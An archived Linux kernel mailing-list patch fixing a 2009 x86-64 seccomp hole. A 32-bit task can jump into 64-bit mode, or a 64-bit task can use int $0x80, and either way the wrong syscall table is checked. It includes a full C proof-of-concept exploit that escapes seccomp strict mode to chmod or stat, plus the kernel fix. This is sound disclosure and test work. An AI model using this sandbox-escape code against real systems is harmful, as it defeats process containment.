[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <20090228030413.5B915FC3DA@magilla.sf.frob.com>
Date: Fri, 27 Feb 2009 19:04:13 -0800 (PST)
From: Roland McGrath <roland@...hat.com>
To: Andrew Morton <akpm@...ux-foundation.org>,
Linus Torvalds <torvalds@...ux-foundation.org>
Cc: x86@...nel.org, linux-kernel@...r.kernel.org, stable@...nel.org
Subject: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@...hat.com>
---
arch/x86/include/asm/seccomp_64.h | 14 ++++++++------
kernel/seccomp.c | 11 ++++++++---
2 files changed, 16 insertions(+), 9 deletions(-)
diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h
index 4171bb7..40e2564 100644
--- a/arch/x86/include/asm/seccomp_64.h
+++ b/arch/x86/include/asm/seccomp_64.h
@@ -3,15 +3,17 @@
#include <linux/thread_info.h>
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on x86_64"
-#else
-#define TIF_32BIT TIF_IA32
-#endif
-
#include <linux/unistd.h>
#include <asm/ia32_unistd.h>
+/*
+ * This indicates we are inside a 32-bit system call (only testable
+ * synchronously by current), whereas TIF_IA32 indicates we are a 32-bit
+ * task. A 32-bit task can make a 64-bit syscall by ljmp into 64-bit
+ * USER_CS, and a 64-bit task can make a 32-bit syscall by int $0x80.
+ */
+#define IS_COMPAT_TASK is_compat_task()
+
#define __NR_seccomp_read __NR_read
#define __NR_seccomp_write __NR_write
#define __NR_seccomp_exit __NR_exit
diff --git a/kernel/seccomp.c b/kernel/seccomp.c
index ad64fcb..8bf212f 100644
--- a/kernel/seccomp.c
+++ b/kernel/seccomp.c
@@ -8,6 +8,7 @@
#include <linux/seccomp.h>
#include <linux/sched.h>
+#include <linux/compat.h>
/* #define SECCOMP_DEBUG 1 */
#define NR_SECCOMP_MODES 1
@@ -22,7 +23,11 @@ static int mode1_syscalls[] = {
0, /* null terminated */
};
-#ifdef TIF_32BIT
+#if defined TIF_32BIT && !defined IS_COMPAT_TASK
+# define IS_COMPAT_TASK test_thread_flag(TIF_32BIT)
+#endif
+
+#ifdef IS_COMPAT_TASK
static int mode1_syscalls_32[] = {
__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
0, /* null terminated */
@@ -37,8 +42,8 @@ void __secure_computing(int this_syscall)
switch (mode) {
case 1:
syscall = mode1_syscalls;
-#ifdef TIF_32BIT
- if (test_thread_flag(TIF_32BIT))
+#ifdef IS_COMPAT_TASK
+ if (IS_COMPAT_TASK)
syscall = mode1_syscalls_32;
#endif
do {
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
Powered by blists - more mailing lists